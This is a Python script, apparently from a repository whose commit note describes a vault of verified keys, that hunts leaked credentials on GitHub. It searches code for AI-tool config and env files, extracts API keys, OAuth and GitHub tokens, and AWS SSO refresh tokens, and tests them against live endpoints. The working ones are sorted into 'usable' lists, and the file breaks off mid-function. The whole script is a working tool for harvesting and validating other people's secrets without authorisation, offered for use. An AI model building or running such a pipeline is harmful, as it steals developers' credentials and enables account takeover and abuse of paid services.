- tools/scripts/llm-key-hunter: GitHub leak hunting pipeline (hunt_*, pivot miner, two-layer verify/content caches, per-provider verification) - usable_keys: verified key vault across 12 providers (deepseek, minimax, volcanoark, longcat, codingplan, zhipu free-tier, mimo, siliconflow, etc.) - .grok/skills/llm-key-hunter: operator skill for the hunt/verify/vault flow - NewAPI channel import scripts and CDP capture helpers - Result verdict buckets (excluding multi-GB blob caches and dedup dumps)
777 lines
30 KiB
Python
777 lines
30 KiB
Python
#!/usr/bin/env python3
|
|
"""Hunt leaked AI-tooling credential files on GitHub.
|
|
|
|
Broad net for credential files of AI coding assistants / SDKs that devs
|
|
accidentally commit. For each kind we search GitHub, fetch the raw file, extract
|
|
credentials, then verify them against the real endpoint.
|
|
|
|
Targets:
|
|
* codeium : .codeium/config.json (apiKey UUID) -> api.codeium.com
|
|
* copilot : github-copilot hosts.json/apps.json (gho_/ghu_/ghp_/ghs_) -> api.github.com
|
|
* claude : .claude/.credentials.json / .claude.json (sk-ant- or OAuth) -> api.anthropic.com
|
|
* aws-sso : ~/.aws/sso/cache/*.json (refreshToken + clientId/Secret) -> oidc.us-east-1.amazonaws.com
|
|
* cline : claude-dev settings/*.json (apiKey per provider)
|
|
* continue : .continue/config.json (apiKey per provider)
|
|
* generic-env: ANTHROPIC_API_KEY / OPENROUTER_API_KEY / CODEIUM_API_KEY ...
|
|
|
|
GitHub is GFW-blocked from this host; all GitHub traffic routes via GH_PROXY.
|
|
Verification of each provider is direct unless blocked (handled per provider).
|
|
|
|
Outputs results/ai_tools/<tool>/{usable,dead,no_access,unknown,all.txt}.
|
|
"""
|
|
|
|
import argparse, base64, json, os, re, subprocess, sys, time, uuid
|
|
import urllib.request, urllib.error, urllib.parse
|
|
from concurrent.futures import ThreadPoolExecutor, as_completed
|
|
from pathlib import Path
|
|
|
|
HERE = Path(__file__).parent
|
|
sys.path.insert(0, str(HERE))
|
|
from verify_cache import CachedVerifier
|
|
from content_cache import ContentCache, parse_raw_url
|
|
RESULTS = HERE / "results" / "ai_tools"
|
|
RESULTS.mkdir(parents=True, exist_ok=True)
|
|
|
|
GH_PROXY = os.environ.get("GH_PROXY", "http://114.111.19.228:3389")
|
|
UA = "curl/8.5.0"
|
|
|
|
|
|
def _mkopener(proxy):
|
|
if proxy:
|
|
return urllib.request.build_opener(
|
|
urllib.request.ProxyHandler({"http": proxy, "https": proxy}))
|
|
return urllib.request.build_opener(urllib.request.ProxyHandler({}))
|
|
|
|
|
|
_gh_op = None
|
|
def gh_opener():
|
|
global _gh_op
|
|
if _gh_op is None:
|
|
_gh_op = _mkopener(GH_PROXY)
|
|
return _gh_op
|
|
|
|
|
|
_dir_op = None
|
|
def direct_opener():
|
|
global _dir_op
|
|
if _dir_op is None:
|
|
_dir_op = _mkopener(None)
|
|
return _dir_op
|
|
|
|
|
|
def github_token():
|
|
t = os.environ.get("GITHUB_TOKEN") or os.environ.get("GH_TOKEN")
|
|
if t:
|
|
return t
|
|
try:
|
|
o = subprocess.run(["gh", "auth", "token"], capture_output=True,
|
|
text=True, timeout=10)
|
|
if o.returncode == 0:
|
|
return o.stdout.strip()
|
|
except FileNotFoundError:
|
|
pass
|
|
p = Path.home() / ".config/gh/hosts.yml"
|
|
if p.exists():
|
|
for line in p.read_text().splitlines():
|
|
if line.strip().startswith("oauth_token:"):
|
|
return line.split(":", 1)[1].strip()
|
|
return None
|
|
|
|
|
|
def http_get(url, token=None, timeout=25, direct=False, headers=None):
|
|
h = {"User-Agent": UA, "Accept": "*/*"}
|
|
if token:
|
|
h["Authorization"] = f"Bearer {token}"
|
|
if headers:
|
|
h.update(headers)
|
|
req = urllib.request.Request(url, headers=h)
|
|
op = direct_opener() if direct else gh_opener()
|
|
try:
|
|
with op.open(req, timeout=timeout) as r:
|
|
return r.getcode(), r.read().decode("utf-8", "replace"), dict(r.headers)
|
|
except urllib.error.HTTPError as e:
|
|
try:
|
|
body = e.read().decode("utf-8", "replace")
|
|
except Exception:
|
|
body = ""
|
|
return e.code, body, dict(e.headers or {})
|
|
except Exception as e:
|
|
return 0, f"net:{type(e).__name__}:{e}", {}
|
|
|
|
|
|
def http_post(url, body, headers, timeout=25, direct=False):
|
|
h = {"User-Agent": UA, "Accept": "*/*",
|
|
"Content-Type": "application/json", **headers}
|
|
data = body if isinstance(body, bytes) else json.dumps(body).encode()
|
|
req = urllib.request.Request(url, data=data, headers=h, method="POST")
|
|
op = direct_opener() if direct else gh_opener()
|
|
try:
|
|
with op.open(req, timeout=timeout) as r:
|
|
return r.getcode(), r.read().decode("utf-8", "replace")
|
|
except urllib.error.HTTPError as e:
|
|
try:
|
|
return e.code, e.read().decode("utf-8", "replace")
|
|
except Exception:
|
|
return e.code, ""
|
|
except Exception as e:
|
|
return 0, f"net:{type(e).__name__}:{e}"
|
|
|
|
|
|
def gh_search(query, token, per_page=100):
|
|
for page in range(1, 11):
|
|
url = ("https://api.github.com/search/code?"
|
|
f"q={urllib.parse.quote(query)}&per_page={per_page}&page={page}")
|
|
code, body, hdrs = http_get(url, token, direct=False)
|
|
if code == 200:
|
|
try:
|
|
data = json.loads(body)
|
|
except Exception:
|
|
return
|
|
items = data.get("items", [])
|
|
for it in items:
|
|
yield it
|
|
if len(items) < per_page:
|
|
return
|
|
time.sleep(2.2)
|
|
elif code in (403, 429):
|
|
reset = hdrs.get("X-RateLimit-Reset")
|
|
wait = max(int(reset) - int(time.time()), 5) if reset else 30
|
|
print(f" rate-limited {wait}s", file=sys.stderr, flush=True)
|
|
time.sleep(wait + 1)
|
|
elif code == 422:
|
|
return
|
|
else:
|
|
print(f" search {code} for {query!r}", file=sys.stderr)
|
|
return
|
|
|
|
|
|
# ----------------------------- extraction ---------------------------------
|
|
# Each extractor takes raw file text and yields (cred, detail_dict)
|
|
|
|
CODEIUM_UUID = re.compile(r"[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}")
|
|
GH_TOKEN = re.compile(r"gh[opsu]_[A-Za-z0-9_]{20,255}")
|
|
SKANT = re.compile(r"sk-ant-[A-Za-z0-9_\-]{20,255}")
|
|
SKOAI = re.compile(r"sk-[A-Za-z0-9]{20,80}")
|
|
ENV_KEY = re.compile(r'\b([A-Z0-9_]*API_KEY|[A-Z0-9_]*TOKEN)\s*[:=]\s*["\']?([A-Za-z0-9_\-\.]{12,255})')
|
|
|
|
|
|
def extract_codeium(text):
|
|
# .codeium/config.json -> { "apiKey": "<uuid>" }
|
|
try:
|
|
j = json.loads(text)
|
|
ak = j.get("apiKey")
|
|
if isinstance(ak, str) and CODEIUM_UUID.search(ak):
|
|
yield ak, {"source": "config.json"}
|
|
# VS Code settings: { "codeium.apiKey": "<uuid>" }
|
|
if isinstance(j, dict):
|
|
for k, v in j.items():
|
|
if isinstance(k, str) and "codeium" in k.lower() and "apikey" in k.lower():
|
|
if isinstance(v, str) and CODEIUM_UUID.search(v):
|
|
yield v, {"source": f"settings:{k}"}
|
|
except Exception:
|
|
pass
|
|
# generic CODEIUM_API_KEY=...
|
|
for m in re.finditer(r'CODEIUM(?:_API)?_KEY\s*[:=]\s*["\']?([0-9a-fA-F\-]{36})', text):
|
|
yield m.group(1), {"source": "env"}
|
|
# "apiKey": "<uuid>" anywhere in a file that mentions codeium
|
|
if "codeium" in text.lower():
|
|
for m in re.finditer(r'"apiKey"\s*:\s*"([0-9a-fA-F\-]{36})"', text):
|
|
yield m.group(1), {"source": "inline-apikey"}
|
|
|
|
|
|
def extract_copilot(text):
|
|
# hosts.json: { "github.com": { "oauthToken": "gho_..." } }
|
|
# apps.json has oauth_token fields
|
|
try:
|
|
j = json.loads(text)
|
|
if isinstance(j, dict):
|
|
for _host, v in j.items():
|
|
if isinstance(v, dict):
|
|
for k in ("oauthToken", "oauth_token", "token", "accessToken"):
|
|
t = v.get(k)
|
|
if isinstance(t, str) and t.startswith(("gho_", "ghu_", "ghp_", "ghs_")):
|
|
yield t, {"field": k, "host": _host}
|
|
except Exception:
|
|
pass
|
|
for m in GH_TOKEN.finditer(text):
|
|
yield m.group(0), {"field": "regex"}
|
|
|
|
|
|
def _looks_like_secret(s):
|
|
"""Reject i18n strings, placeholder text, and non-ASCII junk."""
|
|
if not isinstance(s, str):
|
|
return False
|
|
if len(s) < 30:
|
|
return False
|
|
# only printable ASCII for header-bound tokens
|
|
if any(ord(c) > 127 for c in s):
|
|
return False
|
|
low = s.lower()
|
|
bad = ("your_api_key", "replace_with", "placeholder", "please enter",
|
|
"sk-ant-your", "xxx", "changeme", "paste ", "fill in", "api key",
|
|
"{{", "}}", "select ", "leave blank", "optional", "http://", "https://")
|
|
if any(b in low for b in bad):
|
|
return False
|
|
return True
|
|
|
|
|
|
def extract_claude(text):
|
|
# .claude/.credentials.json: { "claudeAiOauthToken": "eyJ..." }
|
|
try:
|
|
j = json.loads(text)
|
|
if isinstance(j, dict):
|
|
for k, v in j.items():
|
|
if isinstance(v, str) and ("token" in k.lower() or "key" in k.lower()):
|
|
if (v.startswith("sk-ant") or v.startswith("eyJ")) and _looks_like_secret(v):
|
|
yield v, {"field": k}
|
|
if isinstance(v, dict):
|
|
for k2, v2 in v.items():
|
|
if isinstance(v2, str) and ("token" in k2.lower() or "key" in k2.lower()):
|
|
if (v2.startswith("sk-ant") or v2.startswith("eyJ")) and _looks_like_secret(v2):
|
|
yield v2, {"field": f"{k}.{k2}"}
|
|
except Exception:
|
|
pass
|
|
for m in SKANT.finditer(text):
|
|
v = m.group(0)
|
|
if _looks_like_secret(v):
|
|
yield v, {"field": "sk-ant"}
|
|
# OAuth bearer tokens: base64 JWTs (eyJ...) of realistic length
|
|
for m in re.finditer(r"eyJ[A-Za-z0-9_\-]{30,}\.[A-Za-z0-9_\-]{10,}\.[A-Za-z0-9_\-]{10,}", text):
|
|
v = m.group(0)
|
|
if 100 < len(v) < 4000:
|
|
yield v, {"field": "oauth-jwt"}
|
|
|
|
|
|
def extract_aws_sso(text):
|
|
# ~/.aws/sso/cache/*.json: { startUrl, region, accessToken, expiresAt,
|
|
# clientId, clientSecret, refreshToken, registrationExpiresAt }
|
|
# Distinguish real AWS SSO from generic OAuth templates/configs.
|
|
try:
|
|
j = json.loads(text)
|
|
if not isinstance(j, dict):
|
|
return
|
|
rt = j.get("refreshToken")
|
|
cid = j.get("clientId")
|
|
cs = j.get("clientSecret")
|
|
start = j.get("startUrl", "")
|
|
if not (isinstance(rt, str) and isinstance(cid, str) and isinstance(cs, str)):
|
|
return
|
|
# Real AWS SSO cache markers
|
|
if "amazonaws.com" not in str(start) and not str(start).startswith("https://"):
|
|
# still allow if clientId looks like the SSO-registered UUID-ish form
|
|
pass
|
|
# Reject placeholders / generic OAuth
|
|
bad = ("your_", "replace", "example", "xxxx", "client id", "client secret",
|
|
"spotify", "reddit", "<", ">", "*")
|
|
blob = " ".join([str(rt), str(cid), str(cs)]).lower()
|
|
if any(b in blob for b in bad):
|
|
return
|
|
# AWS SSO clientId is a 32-hex-char value; refreshToken is long base64
|
|
if not re.fullmatch(r"[0-9a-fA-F]{32}", cid or ""):
|
|
return
|
|
if len(rt) < 50 or len(cs) < 20:
|
|
return
|
|
yield j, {
|
|
"clientId": cid,
|
|
"clientSecret": cs,
|
|
"region": j.get("region", "us-east-1"),
|
|
"startUrl": start,
|
|
"expiresAt": j.get("expiresAt"),
|
|
}
|
|
except Exception:
|
|
pass
|
|
|
|
|
|
def _valid_api_key(v):
|
|
if not isinstance(v, str):
|
|
return False
|
|
if len(v) < 20:
|
|
return False
|
|
if any(ord(c) > 127 for c in v):
|
|
return False
|
|
low = v.lower()
|
|
bad = ("your_api", "replace_", "placeholder", "sk-your", "sk-ant-your",
|
|
"xxxx", "changeme", "paste-", "fill in", "example", "get it at",
|
|
"create one", "{{", "}}", "<", ">", "api_key", "api key", "null",
|
|
"undefined", "todo", "delete this")
|
|
if any(b in low for b in bad):
|
|
return False
|
|
return True
|
|
|
|
|
|
def extract_cline(text):
|
|
# Cline: { "apiProvider": "...", "apiKey": "sk-...", "clineApiKey": "..." }
|
|
try:
|
|
j = json.loads(text)
|
|
if isinstance(j, dict):
|
|
prov = j.get("apiProvider") or j.get("provider") or "?"
|
|
for k, v in j.items():
|
|
if isinstance(v, str) and ("apiKey" in k or "ApiKey" in k):
|
|
if _valid_api_key(v):
|
|
yield v, {"provider": prov, "field": k}
|
|
for k, v in j.items():
|
|
if isinstance(v, dict):
|
|
for k2, v2 in v.items():
|
|
if isinstance(v2, str) and ("apiKey" in k2 or "ApiKey" in k2):
|
|
if _valid_api_key(v2):
|
|
yield v2, {"provider": prov, "field": f"{k}.{k2}"}
|
|
except Exception:
|
|
pass
|
|
|
|
|
|
def extract_continue(text):
|
|
# .continue/config.json: { "models": [ { "apiKey": "..." } ] }
|
|
try:
|
|
j = json.loads(text)
|
|
if isinstance(j, dict):
|
|
for m in j.get("models", []):
|
|
if isinstance(m, dict):
|
|
key = m.get("apiKey") or m.get("api_key")
|
|
if _valid_api_key(key):
|
|
yield key, {"model": m.get("model") or m.get("title"),
|
|
"provider": m.get("provider")}
|
|
for k, v in j.items():
|
|
if isinstance(v, str) and "apiKey" in k and _valid_api_key(v):
|
|
yield v, {"field": k}
|
|
if isinstance(v, dict):
|
|
key = v.get("apiKey")
|
|
if _valid_api_key(key):
|
|
yield key, {"field": k}
|
|
except Exception:
|
|
pass
|
|
|
|
|
|
def extract_generic_env(text):
|
|
for m in ENV_KEY.finditer(text):
|
|
name, val = m.group(1), m.group(2)
|
|
if val.lower() in ("your_key_here", "changeme", "placeholder", "xxx", "none"):
|
|
continue
|
|
if val.startswith(("sk-", "gh", "r8_", "nk-", "gsk_", "sk-ant")) or len(val) > 25:
|
|
yield val, {"env": name}
|
|
|
|
|
|
# ----------------------------- verification -------------------------------
|
|
# Each verifier returns (verdict, detail). Verdict in USABLE/DEAD/NO_ACCESS/
|
|
# NO_BALANCE/UNKNOWN. ONLY 401 => DEAD; everything non-401 is kept.
|
|
|
|
def verify_codeium(key):
|
|
# Codeium register/metrics endpoint; a registered UUID returns 200/404-ish,
|
|
# an invalid key returns 401/403. POST to register_user with the apiKey.
|
|
body = {"api_key": key, "ide_name": "vscode", "ide_version": "1.0.0",
|
|
"extension_version": "1.0.0", "device_id": str(uuid.uuid4())}
|
|
code, txt = http_post("https://api.codeium.com/register_user/", body,
|
|
{"User-Agent": "codeium-vscode"}, direct=True)
|
|
if code == 200:
|
|
return "USABLE", f"register_user 200: {txt[:80]}"
|
|
if code in (401, 403):
|
|
# Codeium returns 403 for bad key, 401 sometimes too. Per rules only 401=DEAD.
|
|
if code == 401:
|
|
return "DEAD", f"{code} {txt[:80]}"
|
|
return "NO_ACCESS", f"{code} {txt[:80]}"
|
|
if code in (402, 429):
|
|
return "NO_BALANCE", f"{code} {txt[:80]}"
|
|
if code == 0:
|
|
return "UNKNOWN", txt[:100]
|
|
return "NO_ACCESS", f"HTTP {code}: {txt[:80]}"
|
|
|
|
|
|
def verify_copilot(token):
|
|
# GitHub token validity: GET /user (401 bad). For copilot, also check the
|
|
# copilot token entitlement endpoint.
|
|
code, txt, _ = http_get("https://api.github.com/user", token=token, direct=True)
|
|
if code == 401:
|
|
return "DEAD", "401 bad credentials"
|
|
if code != 200:
|
|
if code == 0:
|
|
return "UNKNOWN", txt[:100]
|
|
return "NO_ACCESS", f"user HTTP {code}: {txt[:60]}"
|
|
try:
|
|
who = json.loads(txt).get("login", "?")
|
|
except Exception:
|
|
who = "?"
|
|
# copilot entitlement
|
|
code2, txt2, _ = http_get("https://api.github.com/copilot_internal/v2/token",
|
|
token=token, direct=True)
|
|
if code2 == 200:
|
|
try:
|
|
j = json.loads(txt2)
|
|
exp = j.get("expires_at") or j.get("exp")
|
|
return "USABLE", f"github user={who}; copilot token issued (exp={exp})"
|
|
except Exception:
|
|
return "USABLE", f"github user={who}; copilot 200"
|
|
if code2 in (401,):
|
|
return "DEAD", f"github ok but copilot 401"
|
|
# 404/403 means no copilot subscription but the token itself is valid
|
|
return "NO_ACCESS", f"github user={who}; copilot HTTP {code2}: {txt2[:60]}"
|
|
|
|
|
|
def verify_claude(cred):
|
|
# Could be sk-ant-... or an OAuth token.
|
|
if cred.startswith("sk-ant"):
|
|
code, txt = http_post("https://api.anthropic.com/v1/messages",
|
|
{"model": "claude-3-5-haiku-20241022", "max_tokens": 4,
|
|
"messages": [{"role": "user", "content": "hi"}]},
|
|
{"x-api-key": cred,
|
|
"anthropic-version": "2023-06-01"}, direct=True)
|
|
if code in (200, 400):
|
|
return "USABLE", f"anthropic {code}: {txt[:80]}"
|
|
if code in (401,):
|
|
return "DEAD", f"{code} {txt[:80]}"
|
|
if code in (402, 429):
|
|
return "NO_BALANCE", f"{code} {txt[:80]}"
|
|
if code == 403:
|
|
return "NO_ACCESS", f"{code} {txt[:80]}"
|
|
if code == 0:
|
|
return "UNKNOWN", txt[:100]
|
|
return "NO_ACCESS", f"HTTP {code}: {txt[:80]}"
|
|
# OAuth token: use it as Bearer against the Claude console-ish endpoint.
|
|
# Best check: GET https://api.anthropic.com/api/oauth/claude_api_key (401 if bad)
|
|
code, txt, _ = http_get("https://api.anthropic.com/api/oauth/claude_api_key",
|
|
token=cred, direct=True)
|
|
if code == 200:
|
|
return "USABLE", f"oauth 200: {txt[:80]}"
|
|
if code == 401:
|
|
return "DEAD", f"oauth 401 {txt[:60]}"
|
|
if code in (402, 429):
|
|
return "NO_BALANCE", f"{code} {txt[:60]}"
|
|
if code == 0:
|
|
return "UNKNOWN", txt[:100]
|
|
return "NO_ACCESS", f"HTTP {code}: {txt[:60]}"
|
|
|
|
|
|
def verify_aws_sso(blob, detail):
|
|
# Try to exchange the SSO refresh token via the OIDC token endpoint.
|
|
# This is the AWS SSO OIDC flow: CreateToken with grantType=refresh_token.
|
|
region = detail.get("region", "us-east-1")
|
|
url = f"https://oidc.{region}.amazonaws.com/token"
|
|
body = {"grantType": "refresh_token", "clientId": detail["clientId"],
|
|
"clientSecret": detail["clientSecret"],
|
|
"refreshToken": blob["refreshToken"]}
|
|
code, txt = http_post(url, body,
|
|
{"Content-Type": "application/json",
|
|
"User-Agent": "aws-sdk-js/2.0"}, direct=True, timeout=25)
|
|
if code == 200:
|
|
try:
|
|
j = json.loads(txt)
|
|
return "USABLE", f"SSO token refreshed; accessToken len={len(j.get('accessToken',''))}"
|
|
except Exception:
|
|
return "USABLE", f"SSO 200: {txt[:60]}"
|
|
if code in (400, 401):
|
|
# 400 invalid_grant => token dead; treat as DEAD only if 401 per rules,
|
|
# but invalid_grant 400 is also effectively dead. Keep rule: 401=DEAD, 400=NO_ACCESS.
|
|
if code == 401:
|
|
return "DEAD", f"{code} {txt[:80]}"
|
|
return "NO_ACCESS", f"{code} {txt[:80]}"
|
|
if code in (403,):
|
|
return "NO_ACCESS", f"{code} {txt[:80]}"
|
|
if code in (402, 429):
|
|
return "NO_BALANCE", f"{code} {txt[:80]}"
|
|
if code == 0:
|
|
return "UNKNOWN", txt[:100]
|
|
return "NO_ACCESS", f"HTTP {code}: {txt[:80]}"
|
|
|
|
|
|
def verify_openai_like(key):
|
|
# generic: try /v1/models as a validity probe. 401 = dead, 200/403/429 kept.
|
|
code, txt, _ = http_get("https://api.openai.com/v1/models", token=key, direct=True)
|
|
if code == 200:
|
|
return "USABLE", "openai /v1/models 200"
|
|
if code == 401:
|
|
return "DEAD", "401"
|
|
if code in (403, 404, 429, 402):
|
|
if code in (402, 429):
|
|
return "NO_BALANCE", f"HTTP {code}"
|
|
return "NO_ACCESS", f"HTTP {code}"
|
|
if code == 0:
|
|
return "UNKNOWN", txt[:80]
|
|
return "NO_ACCESS", f"HTTP {code}"
|
|
|
|
|
|
# ----------------------------- tool config -------------------------------
|
|
# kind -> (queries, extractor, verifier, result_subdir)
|
|
|
|
TOOLS = {
|
|
"codeium": {
|
|
"queries": [
|
|
'path:.codeium filename:config.json',
|
|
'.codeium config.json apiKey',
|
|
'filename:config.json "apiKey" "codeium"',
|
|
'CODEIUM_API_KEY',
|
|
'"codeium.checkoutEndpoint" extension:json',
|
|
'"codeium.telemetry.enabled" "apiKey" extension:json',
|
|
'"Codeium.apiKey" extension:json',
|
|
],
|
|
"extract": extract_codeium,
|
|
"verify": verify_codeium,
|
|
},
|
|
"copilot": {
|
|
"queries": [
|
|
'filename:hosts.json github.com oauthToken',
|
|
'filename:apps.json oauth_token copilot',
|
|
'"github.copilot" oauthToken extension:json',
|
|
'copilot-gpt-token apiKey',
|
|
'"vscode-github" "token" extension:json',
|
|
],
|
|
"extract": extract_copilot,
|
|
"verify": verify_copilot,
|
|
},
|
|
"claude": {
|
|
"queries": [
|
|
'filename:.credentials.json anthropic',
|
|
'claudeAiOauthToken extension:json',
|
|
'".claude" "credentials" extension:json',
|
|
'sk-ant-api03',
|
|
'ANTHROPIC_API_KEY sk-ant',
|
|
'".claude.json" "oauthToken"',
|
|
],
|
|
"extract": extract_claude,
|
|
"verify": verify_claude,
|
|
},
|
|
"aws-sso": {
|
|
"queries": [
|
|
'filename:sso cache refreshToken clientId extension:json',
|
|
'"refreshToken" "clientId" "clientSecret" extension:json',
|
|
'path:.aws/sso/cache extension:json',
|
|
'"oidc" "refreshToken" "clientSecret" extension:json',
|
|
'"startUrl" "refreshToken" "clientId" extension:json',
|
|
],
|
|
"extract": extract_aws_sso,
|
|
"verify": verify_aws_sso,
|
|
},
|
|
"cline": {
|
|
"queries": [
|
|
'"apiProvider" "apiKey" "claude-dev" extension:json',
|
|
'filename:cline_settings apiKey',
|
|
'"clineApiKey" extension:json',
|
|
'path:globalStorage saoudrizwan.claude-dev extension:json',
|
|
],
|
|
"extract": extract_cline,
|
|
"verify": verify_openai_like,
|
|
},
|
|
"continue": {
|
|
"queries": [
|
|
'filename:config.json ".continue" apiKey',
|
|
'"tabAutocompleteModel" "apiKey" extension:json',
|
|
'path:.continue config.json models apiKey',
|
|
],
|
|
"extract": extract_continue,
|
|
"verify": verify_openai_like,
|
|
},
|
|
"generic-env": {
|
|
"queries": [
|
|
'OPENROUTER_API_KEY sk-or-v1 extension:env',
|
|
'TOGETHER_API_KEY extension:env',
|
|
'FIREWORKS_API_KEY extension:env',
|
|
'GROQ_API_KEY gsk_ extension:env',
|
|
'ANTHROPIC_API_KEY sk-ant extension:env',
|
|
'CODESTRAL_API_KEY extension:env',
|
|
'GEMINI_API_KEY AIza extension:env',
|
|
'MISTRAL_API_KEY extension:env',
|
|
'DEEPSEEK_API_KEY sk- extension:env',
|
|
],
|
|
"extract": extract_generic_env,
|
|
"verify": verify_openai_like,
|
|
},
|
|
}
|
|
|
|
|
|
def to_raw(html_url):
|
|
return html_url.replace("github.com", "raw.githubusercontent.com").replace("/blob/", "/")
|
|
|
|
|
|
def fetch_raw(url, timeout=20):
|
|
try:
|
|
code, body, _ = http_get(url, direct=False, timeout=timeout,
|
|
headers={"User-Agent": "Mozilla/5.0"})
|
|
if code == 200:
|
|
return body
|
|
except Exception:
|
|
pass
|
|
return ""
|
|
|
|
|
|
def make_cached_fetch(cc, fetcher=fetch_raw):
|
|
"""fetch_raw replacement served by ContentCache (immutable blob SHA)."""
|
|
def cached(url, timeout=20):
|
|
repo, sha, path = parse_raw_url(url)
|
|
if repo and sha and path:
|
|
txt = cc.get(repo, path, sha)
|
|
if txt is not None:
|
|
return txt
|
|
txt = fetcher(url, timeout=timeout)
|
|
if txt:
|
|
cc.put(repo, path, sha, txt)
|
|
return txt
|
|
return fetcher(url, timeout=timeout)
|
|
return cached
|
|
|
|
|
|
def run(kind, token, workers, max_files, do_verify, no_content_cache=False):
|
|
cfg = TOOLS[kind]
|
|
outdir = RESULTS / kind
|
|
outdir.mkdir(parents=True, exist_ok=True)
|
|
print(f"\n{'='*60}\n[{kind}] searching GitHub...\n{'='*60}", flush=True)
|
|
|
|
files = {}
|
|
for i, q in enumerate(cfg["queries"], 1):
|
|
print(f" ({i}/{len(cfg['queries'])}) {q}", flush=True)
|
|
cnt = 0
|
|
for it in gh_search(q, token):
|
|
u = it.get("html_url", "")
|
|
if u and u not in files:
|
|
files[u] = it.get("repository", {}).get("full_name", "?")
|
|
cnt += 1
|
|
if len(files) >= max_files:
|
|
break
|
|
if cnt:
|
|
print(f" +{cnt} (total {len(files)})", flush=True)
|
|
if len(files) >= max_files:
|
|
break
|
|
print(f" candidate files: {len(files)}", flush=True)
|
|
|
|
# fetch raw and extract
|
|
print(f"\n[{kind}] fetching raw + extracting...", flush=True)
|
|
creds = {} # cred(or json blob for aws) -> info
|
|
done = 0
|
|
|
|
with ContentCache(force=no_content_cache) as cc:
|
|
cfetch = make_cached_fetch(cc)
|
|
def _job(u):
|
|
return u, cfetch(to_raw(u))
|
|
|
|
with ThreadPoolExecutor(max_workers=20) as pool:
|
|
futs = {pool.submit(_job, u): (u, repo) for u, repo in files.items()}
|
|
for f in as_completed(futs):
|
|
u, repo = futs[f]
|
|
done += 1
|
|
try:
|
|
_, text = f.result()
|
|
except Exception:
|
|
text = ""
|
|
if not text:
|
|
continue
|
|
try:
|
|
extracted = list(cfg["extract"](text))
|
|
except Exception as e:
|
|
extracted = []
|
|
for item in extracted:
|
|
cred, info = item
|
|
if isinstance(cred, dict):
|
|
key = cred.get("refreshToken", "") + "|" + info.get("clientId", "")
|
|
else:
|
|
key = cred
|
|
if key not in creds:
|
|
creds[key] = {"cred": cred, "info": info, "src": u, "repo": repo}
|
|
if done % 100 == 0:
|
|
print(f" {done}/{len(files)} creds={len(creds)} "
|
|
f"cache={cc.hits}hit/{cc.misses}fetch", flush=True)
|
|
st = cc.stats()
|
|
print(f" content cache: {st['hits']} hits, {st['misses']} fetched "
|
|
f"({st['bytes_served']} bytes from cache)", flush=True)
|
|
print(f" extracted {len(creds)} unique credentials", flush=True)
|
|
|
|
# save raw extraction
|
|
with open(outdir / "all.txt", "w") as f:
|
|
for key, rec in sorted(creds.items()):
|
|
info = rec["info"]
|
|
if isinstance(rec["cred"], dict):
|
|
f.write(f"BLOB|{rec['src']}|{json.dumps(info)}\n")
|
|
else:
|
|
f.write(f"{rec['cred']}|{rec['src']}|{json.dumps(info)}\n")
|
|
|
|
if not do_verify or not creds:
|
|
return
|
|
|
|
# verify
|
|
print(f"\n[{kind}] verifying {len(creds)} credentials (workers={workers})...", flush=True)
|
|
buckets = {"USABLE": [], "DEAD": [], "NO_ACCESS": [], "NO_BALANCE": [], "UNKNOWN": []}
|
|
start = time.time()
|
|
done = 0
|
|
|
|
def _verify(rec):
|
|
cred = rec["cred"]
|
|
if isinstance(cred, dict):
|
|
return cfg["verify"](cred, rec["info"])
|
|
return cfg["verify"](cred)
|
|
|
|
def _cred_key(rec):
|
|
c = rec["cred"]
|
|
return json.dumps(c, sort_keys=True) if isinstance(c, dict) else c
|
|
|
|
key_to_rec = {_cred_key(rec): rec for rec in creds.values()}
|
|
|
|
with CachedVerifier(f"aitools_{kind.lower()}",
|
|
lambda k: _verify(key_to_rec[k]),
|
|
force=os.environ.get("NO_CACHE") == "1") as ver:
|
|
with ThreadPoolExecutor(max_workers=workers) as pool:
|
|
futs = {pool.submit(ver, ck): rec for ck, rec in key_to_rec.items()}
|
|
for f in as_completed(futs):
|
|
rec = futs[f]
|
|
done += 1
|
|
try:
|
|
verdict, detail = f.result()
|
|
except Exception as e:
|
|
verdict, detail = "UNKNOWN", f"exc:{e}"
|
|
buckets.setdefault(verdict, []).append((rec, detail))
|
|
if done % 25 == 0:
|
|
el = time.time() - start
|
|
rate = done / el if el else 0
|
|
counts = " ".join(f"{k.lower()}={len(v)}" for k, v in buckets.items())
|
|
print(f" [{done:4d}/{len(creds)}] {counts} hit={ver.hits} live={ver.live} ({rate:.1f}/s)", flush=True)
|
|
print(f" cache: {ver.hits} hits, {ver.live} live, {len(ver._cache)} cached", flush=True)
|
|
|
|
for name, items in buckets.items():
|
|
with open(outdir / f"{name.lower()}.txt", "w") as f:
|
|
for rec, detail in items:
|
|
if isinstance(rec["cred"], dict):
|
|
f.write(f"BLOB|{rec['src']}|{json.dumps(rec['info'])}|{detail}\n")
|
|
else:
|
|
f.write(f"{rec['cred']}|{rec['src']}|{json.dumps(rec['info'])}|{detail}\n")
|
|
print(f" {name:11s}: {len(items):4d}", flush=True)
|
|
|
|
if buckets["USABLE"]:
|
|
print(f"\n === USABLE {kind} ===", flush=True)
|
|
for rec, detail in buckets["USABLE"]:
|
|
c = rec["cred"]
|
|
shown = json.dumps(rec["info"]) if isinstance(c, dict) else c[:60]
|
|
print(f" {shown} <- {rec['src']}\n {detail}", flush=True)
|
|
|
|
|
|
def main():
|
|
ap = argparse.ArgumentParser()
|
|
ap.add_argument("--tools", default="all",
|
|
help="Comma list, or 'all': " + ",".join(TOOLS.keys()))
|
|
ap.add_argument("--workers", type=int, default=8)
|
|
ap.add_argument("--max-files", type=int, default=1000)
|
|
ap.add_argument("--no-verify", action="store_true")
|
|
ap.add_argument("--no-content-cache", action="store_true",
|
|
help="ignore raw file content cache (always re-crawl)")
|
|
args = ap.parse_args()
|
|
|
|
token = github_token()
|
|
print(f"proxy={GH_PROXY} token={'yes' if token else 'NO (will rate-limit fast)'}", flush=True)
|
|
kinds = list(TOOLS.keys()) if args.tools == "all" else [
|
|
t.strip() for t in args.tools.split(",") if t.strip() in TOOLS]
|
|
print(f"tools: {kinds}", flush=True)
|
|
|
|
summary = {}
|
|
for kind in kinds:
|
|
run(kind, token, args.workers, args.max_files, not args.no_verify,
|
|
no_content_cache=args.no_content_cache)
|
|
outdir = RESULTS / kind
|
|
counts = {}
|
|
for b in ("usable", "dead", "no_access", "no_balance", "unknown"):
|
|
p = outdir / f"{b}.txt"
|
|
